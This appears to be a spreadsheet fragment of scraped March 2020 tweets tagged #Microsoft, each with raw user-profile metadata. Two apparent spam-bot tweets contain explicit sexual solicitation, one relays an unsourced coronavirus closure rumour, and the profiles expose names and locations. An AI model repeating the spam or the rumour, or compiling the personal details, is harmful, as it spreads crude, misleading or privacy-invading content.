'94C238',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</si>
  <si>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Mon Mar 02 00:00:23 +0000 2020</t>
  </si>
  <si>
    <t>Vatican joins forces with #Microsoft and #IBM to promote ethical development of #AI and call for regulation of intrusive technologies such as facial recognition. #facialrecognition https://t.co/j9MIHxMN3E https://t.co/CMcMUnUfbw</t>
  </si>
  <si>
    <t>{'id': 68679309, 'id_str': '68679309', 'name': 'BillingViews', 'screen_name': 'BillingViews', 'location': 'Scotland', 'description': 'It all comes back to Billing. #BSS #OSS #BSSOSS #Billing #Analytics #payments #custserv #IoT #security #fintech', 'url': 'https://t.co/4smES7xj4r', 'entities': {'url': {'urls': [{'url': 'https://t.co/4smES7xj4r', 'expanded_url': 'http://www.disruptiveviews.com', 'display_url': 'disruptiveviews.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1083, 'friends_count': 698, 'listed_count': 329, 'created_at': 'Tue Aug 25 12:26:29 +0000 2009', 'favourites_count': 176, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7737,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'http://pbs.twimg.com/profile_images/560831152747868161/PE0x7Q1b_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/560831152747868161/PE0x7Q1b_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/68679309/1423657265',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</si>
  <si>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00:00:16 +0000 2020</t>
  </si>
  <si>
    <t>Vatican joins forces with #Microsoft and #IBM to promote ethical development of #AI and call for regulation of intrusive technologies such as facial recognition. #facialrecognition https://t.co/UTSnPEoCFw https://t.co/5CdexDzzSv</t>
  </si>
  <si>
    <t>{'id': 23902646, 'id_str': '23902646', 'name': 'John Tanner', 'screen_name': 'TannerHK', 'location': 'Hong Kong', 'description': 'Editor, https://t.co/j005bbAJeI', 'url': 'https://t.co/YuyAf0WEla', 'entities': {'url': {'urls': [{'url': 'https://t.co/YuyAf0WEla', 'expanded_url': 'https://disruptive.asia/', 'display_url': 'disruptive.asia', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/j005bbAJeI', 'expanded_url': 'http://Disruptive.Asia', 'display_url': 'Disruptive.Asia', 'indices': [8, 31]}]}}, 'protected': False, 'followers_count': 102, 'friends_count': 11, 'listed_count': 12, 'created_at': 'Thu Mar 12 05:11:12 +0000 2009', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2602,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'http://pbs.twimg.com/profile_images/776415398828716034/H2GSdOgT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/776415398828716034/H2GSdOgT_normal.jpg', 'profile_link_color': '2FC2EF', 'profile_sidebar_border_color': '181A1E', 'profile_sidebar_fill_color': '252429', 'profile_text_color': '666666', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 00:00:14 +0000 2020</t>
  </si>
  <si>
    <t>Vatican joins forces with #Microsoft and #IBM to promote ethical development of #AI and call for regulation of intrusive technologies such as facial recognition. #facialrecognition https://t.co/3wPCNSneTy https://t.co/ZIAdhk1DDx</t>
  </si>
  <si>
    <t>{'id': 124720878, 'id_str': '124720878', 'name': 'Tony Poulos', 'screen_name': 'tonypoulos', 'location': 'France', 'description': '', 'url': 'http://t.co/aFMGE5iCFN', 'entities': {'url': {'urls': [{'url': 'http://t.co/aFMGE5iCFN', 'expanded_url': 'http://tonypoulos.com', 'display_url': 'tonypoulos.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 964, 'friends_count': 191, 'listed_count': 231, 'created_at': 'Sat Mar 20 10:07:07 +0000 2010', 'favourites_count': 10, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6907,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'http://pbs.twimg.com/profile_images/2808831911/af30e666c0c3ac5dba4a2afe9f6ffd5b_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2808831911/af30e666c0c3ac5dba4a2afe9f6ffd5b_normal.jpeg',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</si>
  <si>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Mon Mar 02 00:00:12 +0000 2020</t>
  </si>
  <si>
    <t>Vatican joins forces with #Microsoft and #IBM to promote ethical development of #AI and call for regulation of intrusive technologies such as facial recognition. #facialrecognition https://t.co/Meb7WBHXKP https://t.co/ONg7jbvT4a</t>
  </si>
  <si>
    <t>{'id': 758341474119520256, 'id_str': '758341474119520256', 'name': 'Disruptive.Asia', 'screen_name': 'DisruptiveAsia', 'location': 'Hong Kong', 'description': '', 'url': 'https://t.co/tWZy7RQ1Vk', 'entities': {'url': {'urls': [{'url': 'https://t.co/tWZy7RQ1Vk', 'expanded_url': 'Https://disruptive.asia', 'display_url': 'disruptive.asia', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 403, 'friends_count': 156, 'listed_count': 77, 'created_at': 'Wed Jul 27 16:41:11 +0000 2016', 'favourites_count': 6, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6575, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/778573459190386688/rKC2KQ6z_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/778573459190386688/rKC2KQ6z_normal.jpg',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</si>
  <si>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23:56:55 +0000 2020</t>
  </si>
  <si>
    <t>A look at what's new with #MicrosoftTeams. The new Outlook integrated experience is going to be a game changer. #MSTeams #Microsoft #Office365 https://t.co/ufiNPVkg3M</t>
  </si>
  <si>
    <t>Sun Mar 01 23:54:00 +0000 2020</t>
  </si>
  <si>
    <t>#Azure - Hola Espana, new region in #EU.  well done, presence in every corner of the world (at least trying to achieve...) #microsoft #datacenter #cloud https://t.co/3hnKb3INl7</t>
  </si>
  <si>
    <t>{'id': 1002498455237996544, 'id_str': '1002498455237996544', 'name': 'Ermir Hoxhaj', 'screen_name': 'vhoxhajermir', 'location': 'Poland', 'description': 'VMware SDDC Cloud System Engineer. VCP6.5 Certified. Virtualization, Cloud, Devops enthusiast and blogger.', 'url': 'https://t.co/Nu85EhcRAa', 'entities': {'url': {'urls': [{'url': 'https://t.co/Nu85EhcRAa', 'expanded_url': 'https://hoxhajermir.com/', 'display_url': 'hoxhajermir.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 51, 'friends_count': 240, 'listed_count': 4, 'created_at': 'Fri Jun 01 10:33:52 +0000 2018', 'favourites_count': 53, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1002500251415179266/I0PaCosm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1002500251415179266/I0PaCosm_normal.jpg',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</si>
  <si>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23:51:38 +0000 2020</t>
  </si>
  <si>
    <t>'over the next five days. Meaning, you should expect all schools in the Seattle area to be closed, and all work stopped. Meaning, #Boeing, #Amazon and #Microsoft will have to halt work for between two to four weeks....'
https://t.co/8zKuyPXFfm #coronavirus</t>
  </si>
  <si>
    <t>{'id': 718804592973053952, 'id_str': '718804592973053952', 'name': 'Cruz Cerda III, Ph.D.', 'screen_name': 'cruzcerda3', 'location': 'California 1', 'description': 'OBJECTIVE Biometric Researcher intrigued by DiverseViewpoints IDG INFLUENCER kindness+compassion=strength CYBERSECURITY DataIntegrity PATIENTSAFETY OpenNet', 'url': 'https://t.co/jALN7GyNMe', 'entities': {'url': {'urls': [{'url': 'https://t.co/jALN7GyNMe', 'expanded_url': 'https://www.linkedin.com/in/cruzcerdaphd/', 'display_url': 'linkedin.com/in/cruzcerdaphâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2236, 'friends_count': 296, 'listed_count': 439, 'created_at': 'Sat Apr 09 14:15:44 +0000 2016', 'favourites_count': 7602, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 66639,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'http://pbs.twimg.com/profile_images/998293847267393536/tRQSs8QX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/998293847267393536/tRQSs8QX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/718804592973053952/1580451600', 'profile_link_color': '0000FF',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</si>
  <si>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23:37:19 +0000 2020</t>
  </si>
  <si>
    <t>If you can make this post get 33 retweets I will send each of you nudes in Dm !!! #Berkeley   #microsoft #liverpool https://t.co/VmkfHZATxz</t>
  </si>
  <si>
    <t>{'id': 1234234879677779968, 'id_str': '1234234879677779968', 'name': 'Becky Mattice', 'screen_name': 'grancourtluchi', 'location': 'Huntsville, USA', 'description': 'Immature love says: â€˜I love you because I need you.â€™ Mature love says â€˜I need you because I love you.â€™  â€“ Erich Fromm', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 25, 'listed_count': 0, 'created_at': 'Sun Mar 01 21:51:46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'http://pbs.twimg.com/profile_images/1234238270587969538/YOAZZqem_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234238270587969538/YOAZZqem_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234234879677779968/1583100344',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</si>
  <si>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23:33:55 +0000 2020</t>
  </si>
  <si>
    <t>Were out here gaming. #xbox #xboxone #xboxonex #microsoft #microsoftfangirl #elitecontroller #eliteseries2 #destiny #destiny2 #bungie #gamer #gamergirl #rescuedogsofinstagram #retiredracer #greyhoundsmakegreatpets https://t.co/t7FDOsBNdo</t>
  </si>
  <si>
    <t>{'id': 823014614770139136, 'id_str': '823014614770139136', 'name': 'Beth', 'screen_name': 'LiteraryAthlete', 'location': 'Madison,  WI', 'description': 'The answer is 42.  I stream on Mixer @ https://t.co/qcZJu5lRMQ', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/qcZJu5lRMQ', 'expanded_url': 'http://Mixer.com/LiteraryAthlete', 'display_url': 'Mixer.com/LiteraryAthlete', 'indices': [39, 62]}]}}, 'protected': False, 'followers_count': 33, 'friends_count': 305, 'listed_count': 0, 'created_at': 'Sun Jan 22 03:49:09 +0000 2017', 'favourites_count': 1392, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 576, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1212104099145105408/6e2x1S4s_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1212104099145105408/6e2x1S4s_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/823014614770139136/1501644696',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</si>
  <si>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23:33:48 +0000 2020</t>
  </si>
  <si>
    <t>The End of an Era: Cisco Catalyst 6500 and its impact https://t.co/kocbY2Nz4x For more info: https://t.co/qGBiLFJRhe #data #security #bigdata #Digitaltransformation #finance #cloud #cybersecurity #CEO #cmo #digital #marketing #microsoft #IOT #internetofthings #dell #cto #business https://t.co/cBaxHbrPF7</t>
  </si>
  <si>
    <t>Sun Mar 01 23:31:08 +0000 2020</t>
  </si>
  <si>
    <t>@Bose &amp;amp; #Microsoft together helping people with #visuallyimpaired gain greater freedom and independance
 #disabilities
https://t.co/EKseoCRErf</t>
  </si>
  <si>
    <t>{'id': 2688430574, 'id_str': '2688430574', 'name': 'Dr Christine Perales', 'screen_name': 'christineperal1', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 158, 'friends_count': 879, 'listed_count': 4, 'created_at': 'Mon Jul 28 21:48:16 +0000 2014', 'favourites_count': 2252, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1690,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'http://pbs.twimg.com/profile_images/1101635929201094656/Qfg1XwBE_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1101635929201094656/Qfg1XwBE_normal.jpg',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</si>
  <si>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23:31:03 +0000 2020</t>
  </si>
  <si>
    <t>Get ready to take down enemies with a vast array of weaponry and see cool graphics in Call of Duty Modern Warfare 3 https://t.co/TNzwpdFp2B #microsoft #xbox #xbox360 #gaming #fps https://t.co/kQR4beUcov</t>
  </si>
  <si>
    <t>Sun Mar 01 23:28:44 +0000 2020</t>
  </si>
  <si>
    <t>Now that #Microsoft's #SurfaceGo2 has leaked into the digital wild, this new #Surface model looks to be a solid update from the first #Windows10 powered #SurfaceGo https://t.co/8Y74MeluAE https://t.co/KsHMjsh1bC</t>
  </si>
  <si>
    <t>{'id': 65233, 'id_str': '65233', 'name': 'Ewan Spence', 'screen_name': 'Ewan', 'location': 'Edinburgh, Scotland', 'description': 'Storyteller in online worlds of media and tech; covering smartphones, music, Eurovision, retro gaming, ZX Spectrum, and more (@ForbesTech @ESCInsight). /he/him/', 'url': 'https://t.co/LvHXIpbYak', 'entities': {'url': {'urls': [{'url': 'https://t.co/LvHXIpbYak', 'expanded_url': 'http://ewanspence.co.uk', 'display_url': 'ewanspence.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 13435, 'friends_count': 1809, 'listed_count': 554, 'created_at': 'Wed Dec 13 22:26:26 +0000 2006', 'favourites_count': 5751, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 37800, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '62006C', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/419862611417513984/-Zx4_Did_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/419862611417513984/-Zx4_Did_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/65233/1414266129', 'profile_link_color': '9266CC', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'EEEEEE', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sun Mar 01 23:22:59 +0000 2020</t>
  </si>
  <si>
    <t>Hey guys who wanna jerk off on my boobs? #Northampton County   #cute #microsoft https://t.co/ZzdMvRbNF9</t>
  </si>
  <si>
    <t>{'id': 1234147206850060289, 'id_str': '1234147206850060289', 'name': 'Stephanie Allen', 'screen_name': 'melukecon', 'location': 'Grand Rapids, USA', 'description': 'A flower cannot blossom without sunshine, and man cannot live without love', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 29, 'listed_count': 0, 'created_at': 'Sun Mar 01 16:03:24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'http://pbs.twimg.com/profile_images/1234153379384918016/ZRRhSdVZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234153379384918016/ZRRhSdVZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234147206850060289/1583080110',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</si>
  <si>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23:15:04 +0000 2020</t>
  </si>
  <si>
    <t>#mustRead series of articles about #ZeroTrust
[Article] Implementing Zero Trust with Microsoft Azure: Identity and Access Management (1 of 6)
https://t.co/8sMyjkD9TZ
#Identity #Microsoft #MFA #ConditionalAccess #CyberSecurity https://t.co/dgesZs8dYL</t>
  </si>
  <si>
    <t>Sun Mar 01 23:09:39 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Excel is such a piece of crap. Just lost hours of work, because I moved the file to a subdirectory while it was open in Excel. Excel pretended to save the file and allowed me to happily close it... and now the changes are non-existent. #microsoft  #office365 #macos</t>
  </si>
  <si>
    <t>{'id': 1207499516154302466, 'id_str': '1207499516154302466', 'name': 'Microsoft Fails', 'screen_name': 'Microsoft_Fails', 'location': '', 'description': 'This account is dedicated to logging my Microsoft-related issues. No other vendor has such destructive productivity impact to my daily operations/work.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 1, 'listed_count': 0, 'created_at': 'Thu Dec 19 03:15:00 +0000 2019',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</si>
  <si>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Sun Mar 01 23:04:41 +0000 2020</t>
  </si>
  <si>
    <t>#MG, #Microsoft, #Mitsubishi, #Mitsumi, #Nike, #Nintendo, #Nokia, The #NorthFace, #Oculus, #Oppo, #Panasonic, Polo #RalphLauren, #Puma, #Roewe, #SAICMotor, #Samsung, #SGMW, #Sharp, #Siemens, #Skechers, #Sony, #TDK, #TommyHilfiger, #Toshiba, #TsinghuaTongfang, #Uniqlo,</t>
  </si>
  <si>
    <t>{'id': 907921818, 'id_str': '907921818', 'name': 'Sergii Kharchenko', 'screen_name': 'ukrreporter', 'location': '', 'description': "news photographer... documentarian... sometimes\nI'm the author of all published here photos, unless otherwise stated", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 150, 'friends_count': 191, 'listed_count': 7, 'created_at': 'Sat Oct 27 11:35:06 +0000 2012', 'favourites_count': 2167, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4636,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'http://pbs.twimg.com/profile_images/1223618322270433280/3ud8Zkdz_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1223618322270433280/3ud8Zkdz_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/907921818/1413224083',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</si>
  <si>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23:00:32 +0000 2020</t>
  </si>
  <si>
    <t>Governments are erecting borders for data
https://t.co/4PnpjyEFkY
#CyberCrime #Microsoft #CloudComputing #CyberSecurity #InfoSec #InformationTechnology #CyberAttack #SecurityRisk #PrivacyThreat #DataProtection #ConsumerPrivacy #DataPrivacy #SecureComms #CyberThreat #IoT https://t.co/6vXjA4K8wo</t>
  </si>
  <si>
    <t>Sun Mar 01 23:00:05 +0000 2020</t>
  </si>
  <si>
    <t>@Gartner_inc has named #Microsoft a Magic Quadrant Leader among #analytics and #BI platforms for the thirteenth year in a row. Read the blog: #PowerBI #Information https://t.co/Zl0Ma3Ofh8 #MSFTAdvocate</t>
  </si>
  <si>
    <t>{'id': 11637522, 'id_str': '11637522', 'name': 'Terry Stein', 'screen_name': 'TerryStein_MSFT', 'location': 'Cincinnati, OH', 'description': 'Modern Workplace Partner Development Manager for @Microsoft. Helping Microsoft #mspartner orgs build successful #cloud practices. #MicrosoftTeams', 'url': 'https://t.co/evu4APGrd6', 'entities': {'url': {'urls': [{'url': 'https://t.co/evu4APGrd6', 'expanded_url': 'https://www.linkedin.com/in/terrystein', 'display_url': 'linkedin.com/in/terrystein', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 750, 'friends_count': 642, 'listed_count': 73, 'created_at': 'Sat Dec 29 18:42:27 +0000 2007', 'favourites_count': 329, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2462,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'http://pbs.twimg.com/profile_images/1146775136097452033/tX2F_P7i_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1146775136097452033/tX2F_P7i_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/11637522/1474039311',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</si>
  <si>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</si>
  <si>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https://t.co/kkQKllLhh5</t>
  </si>
  <si>
    <t>Sun Mar 01 22:58:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft releases Pixhawk-based autonomous soaring drone code @DIYDrones https://t.co/YfkJZvquXX
#Microsoft #utm #airspace #bvlos #flight #unmanned #AutonomousVehicles #automation #drone #drones #uav #uas #nas @eagle_drones_us #eagle_drones_us #eagledrones https://t.co/HMKuYmN1xA</t>
  </si>
  <si>
    <t>{'id': 918162365631418369, 'id_str': '918162365631418369', 'name': 'Eagle Drones', 'screen_name': 'eagle_drones_us', 'location': '100 Illinois Street, Suite 200', 'description': '#Aerial #Engineering #Imaging #Telecom #Construction #Infrastructure #Drones #Drone #Dronephotography #Photogrammetry #UAV #UAS #Illinois #Midwest #Chicago', 'url': 'https://t.co/gPoqADhsTR', 'entities': {'url': {'urls': [{'url': 'https://t.co/gPoqADhsTR', 'expanded_url': 'http://www.eagledrones.us', 'display_url': 'eagledrones.us', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 11274, 'friends_count': 3744, 'listed_count': 55, 'created_at': 'Wed Oct 11 17:12:21 +0000 2017', 'favourites_count': 7490, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 10812,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'http://pbs.twimg.com/profile_images/918163488425603073/lhHI2iGB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/918163488425603073/lhHI2iGB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/918162365631418369/1509126382',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</si>
  <si>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22:54:09 +0000 2020</t>
  </si>
  <si>
    <t>#Certified Instructors Earn More and Learn More at PrepMasters USA  The #1 Online #Microsoft Train-The-Trainer Certification -  https://t.co/hHlcnus0xt https://t.co/BcJ5Wg11M5</t>
  </si>
  <si>
    <t>Sun Mar 01 22:52:08 +0000 2020</t>
  </si>
  <si>
    <t>Ways to prevent Corona #virus #infection .... Stay Safe  
#NHKuwait #kuwait #newhorizons #NHKuwaitFacts #course #offer #training #consultation #Microsoft #oracle #adobe #autodesk #Huawei #KSA #UAE #corona #covid19 #healthylifestyle
# # # #_ https://t.co/DapN7OacqC</t>
  </si>
  <si>
    <t>{'id': 460058248, 'id_str': '460058248', 'name': 'New Horizons Kuwait', 'screen_name': 'Nhkuwait', 'location': 'Kuwait', 'description': 'New Horizons Kuwait is one of the New Horizons Computer Learning Centers. Call 0096522240190', 'url': 'https://t.co/ADtwXVAozX', 'entities': {'url': {'urls': [{'url': 'https://t.co/ADtwXVAozX', 'expanded_url': 'http://www.newhorizons.com.kw', 'display_url': 'newhorizons.com.kw', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 374, 'friends_count': 5, 'listed_count': 21, 'created_at': 'Tue Jan 10 10:20:48 +0000 2012', 'favourites_count': 53, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 652,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True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1124979315081449472/CeQPXGFF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1124979315081449472/CeQPXGFF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/460058248/1415532104', 'profile_link_color': '0994F0',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</si>
  <si>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Sun Mar 01 22:50:22 +0000 2020</t>
  </si>
  <si>
    <t>The Dish On #Apple's Restaurant | Thanks ... | https://t.co/R6tKDLXZ1T #Adoption #AngelaAhrendts #Behavioral #Burberry #CraigFederighi #Economics #Evolution #Experiences #Food #Innovation #IOS #JonathanIve #LongTail #Microsoft #PublicMarkets #RenewableEconomics #Scale #SteveJobs</t>
  </si>
  <si>
    <t>Sun Mar 01 22:41:57 +0000 2020</t>
  </si>
  <si>
    <t>@JoelKatz When u r cracking #Amazon , #UBER &amp;amp; #Microsoft ????</t>
  </si>
  <si>
    <t>{'id': 855946377846829056, 'id_str': '855946377846829056', 'name': 'Tapas âŒÂ®ðŸ…¿ FAN â˜£', 'screen_name': 'smarttapu', 'location': '#world', 'description': 'Love ðŸ’• #XRP #Blockchain &amp; #Crypto \nViews are personal', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 222, 'friends_count': 193, 'listed_count': 0, 'created_at': 'Sun Apr 23 00:48:14 +0000 2017', 'favourites_count': 8622, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4535, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1235322933641383936/dkYTHp-v_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235322933641383936/dkYTHp-v_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/855946377846829056/1573319539',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</si>
  <si>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22:38:29 +0000 2020</t>
  </si>
  <si>
    <t>The Dark 5G network rises!! https://t.co/k1dR3y4Ela #infosec #EthicalHacking #ITSecurity #ITSEC #CyberSecurity #hacking #ransonware #PatchTuesday #windows #Microsoft #android #StaySafeOnline #Taiyyib #ransonware #malware #SecurityIntelligence</t>
  </si>
  <si>
    <t>Sun Mar 01 22:35:25 +0000 2020</t>
  </si>
  <si>
    <t>#PrivateChannels in #Microsoft #Teams are changing the game. Learn how you should prepare and adjust in our free webinar hosted by Victor Lai and @LoryanStrant as they dig into the implications of Private Channels on 26th Mar at 2pm! https://t.co/Kf4eHX8J3e</t>
  </si>
  <si>
    <t>{'id': 1692454800, 'id_str': '1692454800', 'name': 'Joanne Chang', 'screen_name': 'JoanneLeChang', 'location': 'Melbourne, Victoria', 'description': 'Marketing @ AvePoint', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 26, 'friends_count': 67, 'listed_count': 0, 'created_at': 'Fri Aug 23 00:54:40 +0000 2013', 'favourites_count': 154, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 143,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'http://pbs.twimg.com/profile_images/1009227295079346176/0aFRv0z3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1009227295079346176/0aFRv0z3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1692454800/1580176284',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</si>
  <si>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22:33:58 +0000 2020</t>
  </si>
  <si>
    <t>New xbox one dashboard update hurts my brain. #Microsoft #xbox</t>
  </si>
  <si>
    <t>{'id': 1193638375544233984, 'id_str': '1193638375544233984', 'name': 'Al cooks', 'screen_name': 'Al32105775', 'location': '', 'description': 'I cook Thai and Japanese stuff', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 9, 'listed_count': 0, 'created_at': 'Sun Nov 10 21:15:48 +0000 2019', 'favourites_count': 67, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 239, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1193638455441534981/LuKCEp2o_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1193638455441534981/LuKCEp2o_normal.jpg',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</si>
  <si>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22:32:33 +0000 2020</t>
  </si>
  <si>
    <t>Starting my 1st playthrough of Life Is Strange 2. Stop by, say hi and let me know that you saw this post https://t.co/pA09toN6Wy 
#Twitch #Streaming #games #videogames #mystery #lifeisstrange #lifeisstrange2 #xbox #microsoft #xboxone #drama #singleplayer #brothers #abuse #powers https://t.co/JpLeDiUgeS</t>
  </si>
  <si>
    <t>Sun Mar 01 22:29:18 +0000 2020</t>
  </si>
  <si>
    <t>What happens next. #FIFA20 #XboxOne #Microsoft #XboxShare https://t.co/rDFBZAY7DR</t>
  </si>
  <si>
    <t>{'id': 876256163637075969, 'id_str': '876256163637075969', 'name': 'Cryptic95', 'screen_name': 'Joelski955', 'location': 'Wollongong, New South Wales', 'description': 'Xbox and just started streaming so join my Channel and enjoy want you see.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 18, 'friends_count': 238, 'listed_count': 0, 'created_at': 'Sun Jun 18 01:52:04 +0000 2017', 'favourites_count': 151, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 112, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1151357244501417984/ChZ1lJ7J_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1151357244501417984/ChZ1lJ7J_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/876256163637075969/1563339933',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</si>
  <si>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22:26:14 +0000 2020</t>
  </si>
  <si>
    <t>Data-driven transformation is a journey that requires adaptability. With #Microsoft #Azure, Primaxis delivers the data, security and AI you need to build an agile data estate.
https://t.co/RPenLYMAWk https://t.co/GqsXF1PkzU</t>
  </si>
  <si>
